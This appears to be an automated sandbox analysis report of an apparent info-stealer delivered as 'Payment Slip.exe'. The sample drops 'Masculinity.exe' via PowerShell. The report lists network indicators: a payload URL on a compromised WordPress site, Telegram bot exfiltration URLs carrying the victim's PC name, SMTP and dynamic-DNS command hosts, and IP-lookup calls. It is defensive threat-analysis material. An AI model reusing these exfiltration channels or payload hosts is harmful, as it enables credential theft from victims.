Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: smtp.privateemail.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 25 Jul 2024 08:06:02 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/8
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3290148759.0000000023700000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.privateemail.com
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBcq
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20a
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002101E000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000021019000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment Slip.exe, Masculinity.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020ED8000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBcq
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3285985149.000000001FE90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin
Source: unknown HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052D1

System Summary

Source: initial sample Static PE information: Filename: Payment Slip.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Masculinity.exe Jump to dropped file
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_00403358
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 7_2_00403358
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB8828 7_2_04AB8828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABDE28 7_2_04ABDE28
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB702F 7_2_04AB702F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB0023 7_2_04AB0023
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABF620 7_2_04ABF620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB3238 7_2_04AB3238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABDE38 7_2_04ABDE38
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB9B38 7_2_04AB9B38
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB3232 7_2_04AB3232
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABB330 7_2_04ABB330
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB5B37 7_2_04AB5B37
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB290A 7_2_04AB290A
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB4908 7_2_04AB4908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB7508 7_2_04AB7508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB1701 7_2_04AB1701
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABE300 7_2_04ABE300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB8819 7_2_04AB8819
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB2918 7_2_04AB2918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABCB18 7_2_04ABCB18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB5218 7_2_04AB5218
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABB31F 7_2_04ABB31F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB1710 7_2_04AB1710
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABA010 7_2_04ABA010
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABF610 7_2_04ABF610
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABCB16 7_2_04ABCB16
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB6B6A 7_2_04AB6B6A
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB1B68 7_2_04AB1B68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABAE68 7_2_04ABAE68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB126F 7_2_04AB126F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB0960 7_2_04AB0960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB8360 7_2_04AB8360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABD960 7_2_04ABD960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB4467 7_2_04AB4467
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB4478 7_2_04AB4478
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB6B78 7_2_04AB6B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABC178 7_2_04ABC178
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB247E 7_2_04AB247E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABD970 7_2_04ABD970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB9676 7_2_04AB9676
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB9B48 7_2_04AB9B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB3B48 7_2_04AB3B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABC641 7_2_04ABC641
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB0040 7_2_04AB0040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB7040 7_2_04AB7040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABF147 7_2_04ABF147
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB3B58 7_2_04AB3B58
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABF158 7_2_04ABF158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB1B58 7_2_04AB1B58
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABAE58 7_2_04ABAE58
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04ABC650 7_2_04ABC650
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB0950 7_2_04AB0950
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04AB8350 7_2_04AB8350
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DFD0D0 7_2_04DFD0D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF6A80 7_2_04DF6A80
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DFE808 7_2_04DFE808
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF3EC0 7_2_04DF3EC0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0CC0 7_2_04DF0CC0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF5AE0 7_2_04DF5AE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF28E0 7_2_04DF28E0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF3880 7_2_04DF3880
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0680 7_2_04DF0680
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0CAF 7_2_04DF0CAF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF54A0 7_2_04DF54A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF22A0 7_2_04DF22A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF3240 7_2_04DF3240
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0040 7_2_04DF0040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF6440 7_2_04DF6440
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF4E60 7_2_04DF4E60
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF1C60 7_2_04DF1C60
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF9613 7_2_04DF9613
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF5E00 7_2_04DF5E00
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF2C00 7_2_04DF2C00
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF4820 7_2_04DF4820
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF1620 7_2_04DF1620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF57C0 7_2_04DF57C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF25C0 7_2_04DF25C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF41E0 7_2_04DF41E0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0FE0 7_2_04DF0FE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DFE793 7_2_04DFE793
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0990 7_2_04DF0990
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF9388 7_2_04DF9388
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF5180 7_2_04DF5180
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF1F80 7_2_04DF1F80
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF3BA0 7_2_04DF3BA0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF09A0 7_2_04DF09A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF4B40 7_2_04DF4B40
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF1940 7_2_04DF1940
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF6760 7_2_04DF6760
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF3560 7_2_04DF3560
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF0360 7_2_04DF0360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF6110 7_2_04DF6110
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF4500 7_2_04DF4500
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF1300 7_2_04DF1300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF9100 7_2_04DF9100
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF6120 7_2_04DF6120
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04DF2F20 7_2_04DF2F20
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0F668 7_2_04E0F668
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E01828 7_2_04E01828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E07FA8 7_2_04E07FA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0F988 7_2_04E0F988
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0D0E8 7_2_04E0D0E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E09EE8 7_2_04E09EE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E004F7 7_2_04E004F7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0B4C8 7_2_04E0B4C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E082C8 7_2_04E082C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0E6C8 7_2_04E0E6C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0FCA8 7_2_04E0FCA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0CAA8 7_2_04E0CAA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E098A8 7_2_04E098A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0E088 7_2_04E0E088
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0AE88 7_2_04E0AE88
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E00E89 7_2_04E00E89
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E00E98 7_2_04E00E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E02E98 7_2_04E02E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0C468 7_2_04E0C468
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E09268 7_2_04E09268
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E00040 7_2_04E00040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0A848 7_2_04E0A848
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0DA48 7_2_04E0DA48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0F65B 7_2_04E0F65B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0F028 7_2_04E0F028
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E08C28 7_2_04E08C28
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0BE28 7_2_04E0BE28
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0D408 7_2_04E0D408
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0A208 7_2_04E0A208
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E01818 7_2_04E01818
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0001F 7_2_04E0001F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0B7E8 7_2_04E0B7E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E085E8 7_2_04E085E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0E9E8 7_2_04E0E9E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E009C3 7_2_04E009C3
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E09BC8 7_2_04E09BC8
